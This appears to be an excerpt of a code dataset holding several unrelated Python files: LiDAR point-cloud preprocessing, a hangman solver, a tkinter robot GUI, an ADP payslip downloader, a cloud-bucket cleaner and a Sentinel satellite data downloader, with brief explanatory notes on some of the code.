anchors.shape, matched_thresholds.shape)\n # anchors_bv = anchors_bv.reshape([-1, 4])\n anchors_mask = None\n if anchor_area_threshold >= 0:\n coors = coordinates\n dense_voxel_map = box_np_ops.sparse_sum_for_anchors_mask(\n coors, tuple(grid_size[::-1][1:]))\n dense_voxel_map = dense_voxel_map.cumsum(0)\n dense_voxel_map = dense_voxel_map.cumsum(1)\n anchors_area = box_np_ops.fused_get_anchors_area(\n dense_voxel_map, anchors_bv, voxel_size, pc_range, grid_size)\n anchors_mask = anchors_area > anchor_area_threshold\n # example['anchors_mask'] = anchors_mask.astype(np.uint8)\n example['anchors_mask'] = anchors_mask\n # if generate_bev:\n # bev_vxsize = voxel_size.copy()\n # bev_vxsize[:2] /= 2\n # bev_vxsize[2] *= 2\n # bev_map = points_to_bev(points, bev_vxsize, pc_range,\n # without_reflectivity)\n # example[\"bev_map\"] = bev_map\n # if not training:\n # return example\n # if create_targets:\n # targets_dict = target_assigner.assign(\n # anchors,\n # gt_boxes,\n # anchors_mask,\n # gt_classes=gt_classes,\n # matched_thresholds=matched_thresholds,\n # unmatched_thresholds=unmatched_thresholds)\n # example.update({\n # 'labels': targets_dict['labels'],\n # 'reg_targets': targets_dict['bbox_targets'],\n # 'reg_weights': targets_dict['bbox_outside_weights'],\n # })\n return example\n\n\ndef _read_and_prep_v9(info, root_path, num_point_features, prep_func):\n \"\"\"read data from KITTI-format infos, then call prep function.\n \"\"\"\n # velodyne_path = str(pathlib.Path(root_path) / info['velodyne_path'])\n # velodyne_path += '_reduced'\n v_path = pathlib.Path(root_path) / info['velodyne_path']\n v_path = v_path.parent.parent / (\n v_path.parent.stem + \"_reduced\") / v_path.name\n\n points = np.fromfile(\n str(v_path), dtype=np.float32,\n count=-1).reshape([-1, num_point_features])\n image_idx = info['image_idx']\n rect = info['calib/R0_rect'].astype(np.float32)\n Trv2c = info['calib/Tr_velo_to_cam'].astype(np.float32)\n P2 = info['calib/P2'].astype(np.float32)\n\n input_dict = {\n 'points': points,\n 'rect': rect,\n 'Trv2c': Trv2c,\n 'P2': P2,\n 'image_shape': np.array(info[\"img_shape\"], dtype=np.int32),\n 'image_idx': image_idx,\n 'image_path': info['img_path'],\n # 'pointcloud_num_features': num_point_features,\n }\n\n if 'annos' in info:\n annos = info['annos']\n # we need other objects to avoid collision when sample\n annos = kitti.remove_dontcare(annos)\n loc = annos[\"location\"]\n dims = annos[\"dimensions\"]\n rots = annos[\"rotation_y\"]\n gt_names = annos[\"name\"]\n # print(gt_names, len(loc))\n gt_boxes = np.concatenate(\n [loc, dims, rots[..., np.newaxis]], axis=1).astype(np.float32)\n # gt_boxes = box_np_ops.box_camera_to_lidar(gt_boxes, rect, Trv2c)\n difficulty = annos[\"difficulty\"]\n input_dict.update({\n 'gt_boxes': gt_boxes,\n 'gt_names': gt_names,\n 'difficulty': difficulty,\n })\n if 'group_ids' in annos:\n input_dict['group_ids'] = annos[\"group_ids\"]\n example = prep_func(input_dict=input_dict)\n example[\"image_idx\"] = image_idx\n example[\"image_shape\"] = input_dict[\"image_shape\"]\n if \"anchors_mask\" in example:\n example[\"anchors_mask\"] = example[\"anchors_mask\"].astype(np.uint8)\n return example\n\n","sub_path":"second.pytorch/second/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
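The least obvious step in `merge_second_batch` above is the `np.pad` call, which prepends a batch-index column to each sample's voxel coordinates before concatenation. A standalone numpy illustration with made-up coordinates:

```python
import numpy as np

coords_a = np.array([[0, 10, 20], [1, 11, 21]])   # sample 0: (z, y, x) voxels
coords_b = np.array([[2, 30, 40]])                # sample 1

batched = np.concatenate(
    [np.pad(c, ((0, 0), (1, 0)), mode='constant', constant_values=i)
     for i, c in enumerate([coords_a, coords_b])],
    axis=0)

print(batched)
# [[ 0  0 10 20]
#  [ 0  1 11 21]
#  [ 1  2 30 40]]  -> column 0 now says which sample each voxel came from
```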
+{"seq_id":"476375734","text":"from nltk.corpus import words\nimport itertools\nimport operator\n\n\n\n# most_occuring_length = []\n# word_processing_order = []\n# word_list = []\n# choice = ()\n# letter_list = []\n#\n#\n#\n#\n#\n# # choice_list = []\n#\n# alpl = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n# 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n# '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '@', '#', '&']\n\n\n\n\n\n\n\n\n#The purpose of this program is to solve the Political Hangman game at politicalhangman.com\n#The program is only given the dynamic information shown to a user as they are playing the game. This algorythim attempts\n#to solve the game by solving the unkown words. It attempts to solve the words that have a length most commonly found in\n#in the english dictionary. Giving the highest chance that a letter choice will be found in that word. It then sorts the\n#remaining words of a that specific length and gueeses again the most common letter found in the remaining words. Repeating\n#this process allows the algorithem to sort possible words and continue it's most probable character guessing. Once a\n#word has been solved the next most common length of word is attempted to be solves using the same patter, but now using\n#the additional information of letters in that have been correctly guessed and characters remaining that can be guessed.\n\n#\n#\n# # tweet = \"I was proud to endorse BilldeBlasio tonight He is leading the city in a way that brings people together to make a better life for all\"\n# tweet = '_____ _____ __ ______________ _____ _______ _ _____ ____ _________ __ __ ____ ________ _ __ _____ _________ ___________ _____'\n# tweet = '_ __ ___ ____ ______'\n\n\n# def highest_prob_length_let(alpl, tweet):\nchoice = ()\nword_processing_order = []\n\n\ndef word_proc_order(tweet, word_processing_order):\n global word_list\n # global word_processing_order\n\n word_length_order = []\n word_length_list = []\n most_occuring_length = []\n # word_processing_order = []\n\n\n\n # Takes all words in english dictionary and orders the lengths of the words from most common to least - word_length_order\n word_list = words.words()\n # lowercases all words in word_list dictionary\n word_list = [word.lower() for word in word_list]\n length = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n length_dict = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0, 13: 0, 14: 0, 15: 0,\n 16: 0, 17: 0, 18: 0, 19: 0, 20: 0}\n\n for word in word_list:\n for num in length:\n if len(word) == num:\n length_dict[num] = length_dict[num] + 1\n\n else:\n pass\n\n for w in sorted(length_dict, key=length_dict.get, reverse=True):\n a = w, length_dict[w]\n most_occuring_length.append(a)\n word_length_order.append(w)\n\n print('Most occuring lengths of words in English Dict', most_occuring_length)\n\n # print(word_length_order) #--- Most common lengths of words in dict order\n\n # Writes to list the length of each word in tweet\n word_lengths = (list(map(len, tweet.split())))\n # print(word_lengths) #--- lengths of words in tweet\n\n\n\n # determines what length of word in tweet exists in word_length_order and returns the first same length as x\n for length in word_length_order:\n if length in word_lengths:\n if length not in word_processing_order:\n word_processing_order.append(length)\n # print('pass')\n\n print('Most occuring lengths of words in tweet', word_processing_order)\n\n\n # return 
word_processing_order\n\n\n# def highest_prob_length_let(tweet, alpl):\n\n\ndef first_choice(tweet,alpl):\n\n global choice\n from ML_test1 import choice\n\n\n # global choice\n # global alpl\n global word_processing_order\n global word_list\n\n\n #added for testing\n # global tweet\n\n most_occuring_length = []\n word_length_order = []\n word_length_list = []\n # word_processing_order = []\n # word_lengths = []\n # x = ()\n # choice = ()\n letter_list = []\n\n word_proc_order(tweet, word_processing_order)\n\n x = word_processing_order[0]\n print('Word Length to be processed', x)\n\n\n # print(word_lengths) #--- lengths of words in tweet\n # print(word_processing_order) #--- Processing Order for lengths of words in tweet\n\n # creates a list of words from the dictionary/word_list that have the same\n # length as the most common length of word from the tweet\n for word in word_list:\n if len(word) == x:\n word_length_list.append(word)\n else:\n pass\n\n for word in word_length_list:\n for char in word:\n letter_list.append(char)\n\n # print(choice)\n # The counter determines which letter is most common\n # in all of the possible words with the most common length\n from collections import Counter\n c = Counter(letter_list)\n first_letter_choice_tup = c.most_common(36)\n choice_list = []\n for j, k in first_letter_choice_tup:\n if j in alpl:\n choice_list.append(j)\n choice = choice_list[0]\n print('Most common letters in most common word length being processed', choice_list)\n print('Most common letter still in alpl choices', choice)\n # alpl.remove(choice)\n # print(word_processing_order)\n # print(word_length_order)\n\n\n ###added for testing\n # tweet = 'hypotaxia acrospire bip___ic'\n print('final',choice)\n\n return choice\n\ndef word_guessing(tweet,alpl):\n\n global word_processing_order\n global choice\n\n if len(word_processing_order) == 0:\n\n word_proc_order(tweet, word_processing_order)\n\n # while True:\n print('top')\n comparing_words = []\n\n\n #gets all words from tweet that equal the currently evaluated word length\n for word in tweet.split():\n if len(word) == word_processing_order[0]:\n comparing_words.append(word)\n\n possible_words = []\n\n o = []\n for l in comparing_words:\n for i in l:\n o.append(i)\n\n if \"_\" not in o:\n comparing_words = []\n del word_processing_order[0]\n for word in tweet.split():\n if len(word) == word_processing_order[0]:\n comparing_words.append(word)\n\n\n print('Word Length to be processed', word_processing_order[0])\n print('comparing words',comparing_words)\n print(\"word list length\", len(word_list))\n\n\n\n for l in comparing_words:\n print(l)\n let_list = []\n for char in l:\n let_list.append(char)\n for i in word_list:\n # print(i)\n u = list(i)\n # print(u)\n for n,t in enumerate(u):\n if t not in let_list:\n u[n] = '_'\n # print(u)\n if u == let_list:\n # print(i)\n possible_words.append(i)\n # if u == let_list:\n # new_idea.append(word)\n\n print(possible_words)\n\n if len(possible_words) == 0:\n print('HHHHHHHHH')\n del word_processing_order[0]\n word_guessing(tweet, alpl)\n return choice\n\n\n letter_list = []\n for word in possible_words:\n for char in word:\n letter_list.append(char)\n print('letter list', letter_list)\n\n\n #### Break possible words apart and return most common letter as the guess\n from collections import Counter\n c = Counter(letter_list)\n first_letter_choice_tup = c.most_common(36)\n choice_list = []\n for j, k in first_letter_choice_tup:\n if j in alpl:\n choice_list.append(j)\n # 
print(first_letter_choice_tup)\n # print(choice_list)\n\n print('choice list', choice_list)\n print(choice_list[0])\n choice = choice_list[0]\n print('Most common letters in most common word length being processed', choice_list)\n print('Most common letter still in alpl choices', choice)\n\n # print(first_letter_choice_tup)\n # print(choice)\n return choice\n\ndef highest_prob_length_let(tweet, alpl):\n\n #Initiates the word_guessing function after the initial letter guess is made successfully.\n # while True:\n for word in tweet.split():\n for char in word:\n if char != \"_\":\n word_guessing(tweet, alpl)\n return choice\n\n first_choice(tweet,alpl)\n\n # print('here',choice)\n return choice\n\n# highest_prob_length_let(tweet, alpl)\n# print(choice)\n\n\n\n","sub_path":"First_attemp_dict_sort.py","file_name":"First_attemp_dict_sort.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
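The heart of `word_guessing` above is: filter the dictionary down to words that fit the masked pattern, then guess the most frequent letter not yet tried. A condensed, self-contained sketch of that step (names invented for illustration):

```python
from collections import Counter

def best_guess(masked, dictionary, untried):
    known = set(masked) - {'_'}
    def fits(word):
        # Revealed positions must match exactly; blanks cannot hide a
        # letter that has already been revealed elsewhere in the word.
        return len(word) == len(masked) and all(
            (m == c) if m != '_' else (c not in known)
            for m, c in zip(masked, word))
    counts = Counter(c for w in dictionary if fits(w) for c in w)
    for letter, _ in counts.most_common():
        if letter in untried:
            return letter
    return None

print(best_guess('b_ll', ['ball', 'bell', 'bull', 'bolt'], set('aeiou')))  # -> 'a'
```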
+{"seq_id":"537938955","text":"import tkinter as tk\nfrom tkinter import font as tkfont\nimport wifiInterface\nimport PIL.Image, PIL.ImageTk\n\nclass InterfaceApp(tk.Tk):\n\n def __init__(self):\n tk.Tk.__init__(self)\n\n #Tkinter configurations\n self.title_font = tkfont.Font(family='Consolas', size=15, weight=\"bold\")\n self.info_font = tkfont.Font(family='Consolas', size=10, weight=\"bold\")\n self.geometry(\"500x500\")\n self.title('InterfaceApp')\n\n #Wifiinterface\n self.wifiinterface = wifiInterface.wifiInterface()\n\n # the container is where we'll stack a bunch of frames\n # on top of each other, then the one we want visible\n # will be raised above the others\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n for allframes in (AccessPoints, ConnectPage, Connected):\n page_name = allframes.__name__\n frame = allframes(parent=container, controller=self)\n self.frames[page_name] = frame\n\n # put all of the pages in the same location;\n # the one on the top of the stacking order\n # will be the one that is visible.\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(\"ConnectPage\")\n\n\n #Function to show a given tkinter page referenced by name\n def show_frame(self, page_name):\n frame = self.frames[page_name]\n frame.tkraise()\n\nclass AccessPoints(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller=controller\n label = tk.Label(self, text=\"Select RUFUS' network to connect\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n label = tk.Label(self, text=\"Available Access points:\", font=controller.info_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n\n # List of AP's\n self.aplist = tk.Listbox(self, bg=\"#A0A0A0\", width=30)\n\n self.aplist.pack(side=\"top\")\n\n connectAPButton = tk.Button(self, text=\"Connect\",\n command=lambda: self.tryAP(controller))\n connectAPButton.pack(side=\"top\")\n\n refreshButton = tk.Button(self, text=\"Refresh\",\n command=lambda: self.refreshAPS(controller))\n refreshButton.pack(side=\"top\")\n\n def tryAP(self, controller):\n pass\n\n def refreshAPS(self, controller):\n\n\n self.aplist.insert(1, \"Not implemented yet\")\n\n controller.wifiinterface.getAPS()\n\n\n#Class to handle connection\nclass ConnectPage(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n label = tk.Label(self, text=\"Connect to RUFUS\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n label = tk.Label(self, text=\"Enter IP and port to connect:\", font=controller.info_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n\n backgroundColor = \"#c0c0c0\"\n self.configure(background=backgroundColor)\n\n #### entry stuff #####\n self.ip_v = tk.StringVar()\n self.port_v = tk.StringVar()\n\n IP_entry = tk.Entry(self, width=15, textvariable=self.ip_v)\n IP_entry.pack(side=\"top\")\n self.ip_v.set(\"192.168.5.174\")\n\n Port_entry = tk.Entry(self, width=10, textvariable=self.port_v)\n Port_entry.pack(side=\"top\")\n self.port_v.set(\"10000\")\n\n #### if button pressed, check for connection #####\n connectbutton = tk.Button(self, text=\"Connect\",\n command=lambda: controller.wifiinterface.CheckConnect(self.controller, self.ip_v, self.port_v))\n connectbutton.pack(side=\"bottom\")\n\n\n\n#Class to handle stream of data\nclass 
Connected(tk.Frame):\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n \t############# test with Viktor's code ################\n \t# Create label (area for showing video)\n\t\tself.VideoFeedLabel = tk.Label(self)\n\t\tself.VideoFeedLabel.pack()\n \t\t# Add button Function\n\t\tdef disconnect(parent, controller):\n\t\t controller.wifiinterface.CloseConnection(controller)\n\n\t\t# Add Button\n\t\tdisconnect_button = tk.Button(self, text=\"Disconnect\", command=lambda: disconnect(parent,controller), bg=\"OrangeRed2\", fg=\"white\")\n\n\t\tdisconnect_button.place(rely=0,relx=1,anchor=tk.NE)\n\n\t\tself.distance_var = tk.StringVar()\n\t\tself.distance_var.set(\"XXXXXXX\")\n\n\t\tself.distance_label = tk.Label(self, textvariable=self.distance_var, font=(\"Helvetica\", 12))\n\t\tself.distance_label.place(rely=0,relx=0,anchor=tk.NW)\n\n\tdef display(self, frame_img):\n\n\t\tself.VideoFeedLabel.config(image=frame_img)\n\t\tself.VideoFeedLabel.image = frame_img\n","sub_path":"Controller/InterfaceApp.py","file_name":"InterfaceApp.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"245313939","text":"#!/usr/bin/env python3\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\nimport requests\nimport getpass\nimport pdb\nimport sys\nimport os\nimport re\n\ncompany = input(\"Company Code: \")\nusername = input(\"Username: \")\npassword = getpass.getpass()\n\nprint(\"Starting request session\")\ns = requests.session()\n\nLOGIN_ENDPOINT = \"https://www.adpworld.de/ipclogin/5/loginform.fcc\"\nLOGIN_PARAMS = {\"COMPANY\": company, \"USER\": username, \"PASSWORD\": password, \"TARGET\": \"-SM-https%3a%2f%2fwww%2eadpworld%2ede%2findex%2ehtml\"}\n\nprint(\"Trying to login… \", end=\"\")\nreq = s.post(LOGIN_ENDPOINT, data=LOGIN_PARAMS)\nif \"JSESSIONID\" in s.cookies:\n print(\"success!\")\nelse:\n print(\"FAIL. Please check your credentials.\")\n sys.exit(1)\n\n# Now parse the landing page to find the URL to the ePayslip application\nsoup = BeautifulSoup(req.text, 'html.parser')\npayslip_param = list(filter(lambda x: \"ePayslip\" in x.text,soup.find_all(\"a\")))\npayslip_url = payslip_param[0].get(\"href\")\nurl = \"{}{}\".format(req.url, payslip_url)\n\n# Access the ePayslip app to read out a few parameters and the total amount of stored payslips\nreq = s.get(url)\nsoup = BeautifulSoup(req.text, 'html.parser')\npaginator_text = soup.find(\"table\").find(\"span\", {\"class\": \"ui-paginator-current\"}).text\ntotal_payslips = int(re.match(\".*?([0-9]*)$\", paginator_text).group(1))\n#links = list(filter(lambda x: \"DocDownload\" in x.get(\"href\"), soup.find_all(\"a\")))\nglobal epayslip_soup\nepayslip_soup = soup\n\nADP_BASE_URL = parse.urlunparse(parse.urlparse(req.url)._replace(path=\"\"))\n\ndef paginator_xhr(first=0, rows=20):\n global epayslip_soup\n metadata = list(epayslip_soup.find_all(\"input\"))\n target_elements = list(epayslip_soup.find(\"form\").find_all(\"div\"))\n magic_application_id = list(filter(lambda x: \"dataTable\" in x.get(\"class\"), target_elements))[0].get(\"id\")\n javax_faces_encodedURL = list(filter(lambda x: x.get(\"name\") == \"javax.faces.encodedURL\", metadata))[0].get(\"value\")\n javax_faces_ViewState = list(filter(lambda x: x.get(\"name\") == \"javax.faces.ViewState\", metadata))[0].get(\"value\")\n SUBMIT = list(filter(lambda x: \"SUBMIT\" in x.get(\"name\"), metadata))[0].get(\"name\")\n data = {\n \"javax.faces.partial.ajax\": True,\n \"javax.faces.source\": magic_application_id,\n \"javax.faces.partial.execute\": magic_application_id,\n \"javax.faces.partial.render\": magic_application_id,\n magic_application_id: magic_application_id,\n magic_application_id + \"_pagination\": True,\n magic_application_id + \"_first\": first,\n magic_application_id + \"_rows\": rows,\n magic_application_id + \"_encodeFeature\": True,\n \"javax.faces.encodedURL\": javax_faces_encodedURL,\n SUBMIT: \"1\"\n }\n xhr_link = parse.urljoin(ADP_BASE_URL, javax_faces_encodedURL)\n req = s.post(xhr_link, data=data, headers={\"Faces-Request\": \"partion/ajax\"})\n root = ET.fromstring(req.text)\n changes = list(list(root)[0])\n soup = BeautifulSoup(changes[0].text, \"html.parser\")\n all_a = list(soup.find_all(\"a\"))\n all_page_links = list(map(lambda x: parse.urljoin(ADP_BASE_URL, x.get(\"href\")), all_a))\n new_ViewState = changes[1].text\n return all_page_links\n\ndef download_payslip(url):\n #print(\"Downloading {}\".format(url))\n req = s.get(url)\n if (req.headers.get(\"Content-Type\") != \"application/pdf\"):\n print(\"{} is not a PDF, skipping download. 
Please check manually\".format(url))\n return\n cd_header = req.headers.get(\"Content-Disposition\")\n pdf_filename = cd_header.split(\"\\\"\")[1]\n assert not \"/\" in pdf_filename\n if os.path.isfile(\"downloads/\" + pdf_filename):\n print(\"{} already exists, skipping download…\".format(pdf_filename))\n else:\n print(\"Downloading {}… \".format(pdf_filename), end=\"\")\n with open(\"downloads/\" + pdf_filename, \"wb\") as fp:\n fp.write(req.content)\n\nprint(\"Collecting all payslip URLs via XHR. We expect {} in total.\".format(total_payslips))\nlinks = []\nwhile len(links) < total_payslips:\n print(\"Fetching payslips {}-{}… \".format(len(links), len(links)+99), end=\"\")\n new_links = paginator_xhr(len(links), 99)\n links += new_links\n print(\"Done.\")\nprint(\"Successfully fetched all payslip download URLs. Now downloading…\")\n\nfor link in links:\n download_payslip(link)\nprint(\"All downloads succeeded. Done, exiting.\")\n","sub_path":"adp_downloader.py","file_name":"adp_downloader.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
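The XHR reply parsed in `paginator_xhr` above is a JSF partial-response document. A minimal illustration of the two `changes` children the code relies on (the XML here is invented and abridged):

```python
import xml.etree.ElementTree as ET

# Shape assumed by paginator_xhr: the first child carries the re-rendered
# HTML fragment, the second carries the fresh ViewState token.
xml_text = (
    '<partial-response><changes>'
    '<update id="form:dataTable"><![CDATA[<a href="link1">p1</a>]]></update>'
    '<update id="javax.faces.ViewState"><![CDATA[abc123]]></update>'
    '</changes></partial-response>'
)
root = ET.fromstring(xml_text)
changes = list(list(root)[0])
print(changes[0].text)   # the HTML fragment containing the payslip links
print(changes[1].text)   # 'abc123'
```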
+{"seq_id":"196041001","text":"#\n# (C) Copyright IBM Corp. 2018\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom pywren_ibm_cloud.storage import storage\nimport logging\nimport sys\nimport os\n\nlogger = logging.getLogger(__name__)\n\ndef clean_bucket(bucket, prefix, storage_config):\n storage_handler = storage.Storage(storage_config)\n sys.stdout = open(os.devnull, 'w')\n clean_os_bucket(bucket, prefix, storage_handler)\n sys.stdout = sys.__stdout__\n\ndef clean_os_bucket(bucket, prefix, storage_handler):\n logger.info(\"Going to delete all objects from bucket '{}' and prefix '{}'\".format(bucket, prefix))\n total_objects = 0\n objects_to_delete = storage_handler.list_objects(bucket, prefix)\n \n while objects_to_delete:\n if 'Key' in objects_to_delete[0]:\n # S3 API\n delete_keys = [obj['Key'] for obj in objects_to_delete]\n elif 'name' in objects_to_delete[0]:\n # Swift API\n delete_keys = [obj['name'] for obj in objects_to_delete]\n logger.debug('{} objects found'.format(len(delete_keys)))\n total_objects = total_objects + len(delete_keys)\n storage_handler.delete_objects(bucket, delete_keys)\n objects_to_delete = storage_handler.list_objects(bucket, prefix)\n logger.info('Finished deleting objects, total found: {}'.format(total_objects))\n","sub_path":"pywren/pywren_ibm_cloud/storage/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"445539347","text":"'''\n Purpose: Universal downloader for Sentinel data\n Version: v1.0 10/2018\n Author: Ben Loveday, Plymouth Marine Laboratory\n Notes: This code is offered with no warranty and under the MIT licence.\n \n To come in future versions:\n - add filtering of downloads by regional flag coverage\n - initialise with config file (not arguments)\n \n Usage:\n /opt/local/bin/python3.6 Universal_Sentinel_Downloader.py -p -n -i 50.0,-10.0:51.0,-9.0 -l Sentinel-3 -x OL_2_WFR* -f NOW-10 -u 'https://coda.eumetsat.int'\n\n'''\n\nimport logging\nimport re\nimport requests\nfrom lxml import etree\nimport os\nfrom datetime import datetime, timedelta\nfrom glob import glob\nimport tempfile\nimport optparse\nimport sys, os, shutil\nimport numpy as np\n\n# ------------------------------------------------------------------------------\ndef Define_request(par,url_hub):\n # Define search request and set par['hub']\n url_str = url_hub + '/search?q='\n \n for key in par['req'].keys():\n if url_str[-3:]!='?q=': url_str += ' AND '\n url_str += '%s:%s'%(key,par['req'][key])\n \n url_str += '&rows=%i&start=0'%par['max_rows']\n par['hub']=url_hub\n\n return url_str,par\n\n# ------------------------------------------------------------------------------\ndef parse_xml(xml_text):\n # this line is python version dependant!!\n if sys.version_info[0] == 3:\n xml_str = re.sub(b' xmlns=\"[^\"]+\"', b'', xml_text, count=1)\n else:\n xml_str = re.sub(' xmlns=\"[^\"]+\"', '', xml_text, count=1)\n\n root = etree.fromstring(xml_str)\n entry_list = root.xpath(\"//entry\")\n \n res = []\n for ee in entry_list:\n dt = {\n 'uuid': ee.xpath(\"str[@name='uuid']/text()\")[0],\n 'identifier': ee.xpath(\"str[@name='identifier']/text()\")[0],\n 'beginposition': ee.xpath(\"date[@name='beginposition']/text()\")[0],\n 'endposition': ee.xpath(\"date[@name='endposition']/text()\")[0],\n }\n res.append(dt)\n \n return res\n\n# ------------------------------------------------------------------------------\ndef process_request(par,logging): \n\n # open requests session\n with requests.Session() as req_ses:\n\n # define transport adaptor\n adaptor = requests.adapters.HTTPAdapter(max_retries=par['Retries'])\n \n # define URL\n url_str,par = Define_request(par,par['url'])\n\n # ------------------------------------------------------------------------\n # Request available files\n logging.info(\"Processing request at specified data HUB ... \")\n\n # try to connect to primary hub first:\n req_ses.mount(par['hub'], adaptor)\n logging.info('Querying data at: ' + par['hub'])\n logging.info('Query: ' + url_str)\n r = req_ses.get(url_str, auth=(par['user'],par['pass']), timeout=par['Timeout'])\n logging.info('Code '+par['url']+': ' + str(r.status_code))\n\n if r.status_code != 200:\n req_ses.close()\n logging.error(\"Data query to \"+par['hub']+\" was not successful! 
(\"+str(par['Retries'])+\" retries)\")\n\n logging.info(\"Done\")\n if r.status_code == 200:\n # parse xml code: extract image names and UUID\n entries = parse_xml(r.content)\n if len(entries)>=par['max_rows']:\n logging.error(\"The number of scenes (\"+str(len(entries))+\") is greater than maximum (\"+str(par['max_rows'])+\"): increase max_rows!\")\n req_ses.close()\n raise Exception(\"The number of scenes (\"+str(len(entries))+\") is greater than maximum (\"+str(par['max_rows'])+\"): increase max_rows!\")\n else:\n entries = False\n\n return entries\n\n# ------------------------------------------------------------------------------\ndef download_files(par,entries,logging):\n # open requests session\n with requests.Session() as req_ses:\n\n # ----------------------------------------------------------------------\n # Create temp_dir\n temp_dir = tempfile.mkdtemp(suffix='_esa_downloader')\n # ----------------------------------------------------------------------\n # download files\n logging.info(\"Started downloading %i files ...\"%len(entries))\n for ee in entries:\n split_id = ee['identifier'].split('_')\n sensor = split_id[0][:2]\n\n # check if the file already exists in the archive\n try:\n if sensor.lower()=='s1':\n dtime = datetime.strptime(split_id[5], '%Y%m%dT%H%M%S')\n elif sensor.lower()=='s2':\n # annoying date format change\n try:\n logging.info('Trying for old date format')\n dtime = datetime.strptime(split_id[5], '%Y%m%dT%H%M%S')\n except:\n logging.info('Failed: Trying for new date format')\n dtime = datetime.strptime(split_id[6], '%Y%m%dT%H%M%S')\n elif sensor.lower()=='s3':\n dtime = datetime.strptime(ee['identifier'][16:31], '%Y%m%dT%H%M%S')\n else:\n logging.error(\"Not a Sentinel file name!\")\n raise Exception(\"Not a Sentinel file name!\")\n except:\n logging.warning('Unknown file format...skipping this url: '+ee['identifier'])\n continue\n\n if par['make_sub_dir']:\n arc_dir = os.path.join(par['root_dir'],dtime.strftime('%Y/%m/%d'))\n else:\n arc_dir = par['root_dir']\n \n fname = os.path.join(arc_dir,ee['identifier']+'*')\n fnames = glob(fname)\n\n # build url string & isolate file\n url_str = par['hub'] + \"/odata/v1/Products('%s')/$value\"%ee['uuid']\n try:\n r = req_ses.get(url_str, auth=(par['user'], par['pass']), stream=True)\n except:\n logging.warning('Hub misbehaving, skipping this url')\n logging.info('>>> '+url_str)\n continue\n\n # check file size\n file_size=-1\n try:\n base_fname = r.headers['content-disposition'].split('=')[1].strip('\"')\n file_size = int(r.headers['content-range'].split('/')[1])\n except:\n logging.info('Hub misbehaving, skipping this url')\n logging.info('>>> '+url_str)\n continue\n\n # download file to temp dir\n temp_fname = os.path.join(temp_dir,base_fname)\n logging.info(\"Downloading %s ... 
\"%base_fname)\n\n chunk_count = 0.\n chunk_size = 1024\n iters=np.arange(0,110,10)\n niter=0\n with open(temp_fname, 'wb') as f:\n for chunk in r.iter_content(chunk_size=chunk_size):\n chunk_count = chunk_count + chunk_size\n if chunk: # filter out keep-alive new chunks\n percent_done = float(chunk_count)/float(file_size)*100.\n if percent_done >= iters[niter]:\n logging.info(str(int(percent_done))+'% complete')\n logging.info(str(float(chunk_count/(1024.*1024.)))+' Mb downloaded')\n niter = niter+1\n f.write(chunk)\n f.flush()\n\n # get file timestamp\n timestamp = os.stat(temp_fname).st_mtime\n \n # copy from temp to archive\n if not os.path.exists(arc_dir):\n os.makedirs(arc_dir)\n\n try:\n shutil.move(temp_fname,arc_dir)\n except:\n #remnant of old file:\n os.remove(arc_dir+'/'+os.path.basename(temp_fname))\n shutil.move(temp_fname,arc_dir)\n\n # delete temp_dir\n shutil.rmtree(temp_dir)\n logging.info(\"Finished downloading!\")\n\n return\n\n# ------------------------------------------------------------------------------\ndef default_param():\n par = {\n 'Retries': 1,\n 'Timeout': None,\n 'url':'https://coda.eumetsat.int/',\n 'hub':None, # eventual hub used to download: one of the urls above.\n 'max_rows': 99 # maximum number of rows to request, increase if need more: but hub limits at 100 (as of 28/10/2016)!\n }\n \n par['req'] = {}\n\n return par\n\n# ------------------------------------------------------------------------------\ndef parse_date(date_str,midnight=False): \n if date_str!='':\n if date_str[:3].upper()=='NOW':\n if len(date_str)==3:\n dt = datetime.now()\n elif date_str[3]=='-':\n dt = datetime.now() - timedelta(days=int(options.date_from[4:]))\n else:\n raise Exception(\"Incorrect date!\")\n else:\n if len(date_str)==8:\n dt = datetime.strptime(date_str, '%Y%m%d')\n if midnight: dt += timedelta(hours=23,minutes=59,seconds=59.999)\n else:\n dt = datetime.strptime(date_str, '%Y%m%dT%H%M%S')\n else:\n raise Exception(\"Date not set!\")\n\n 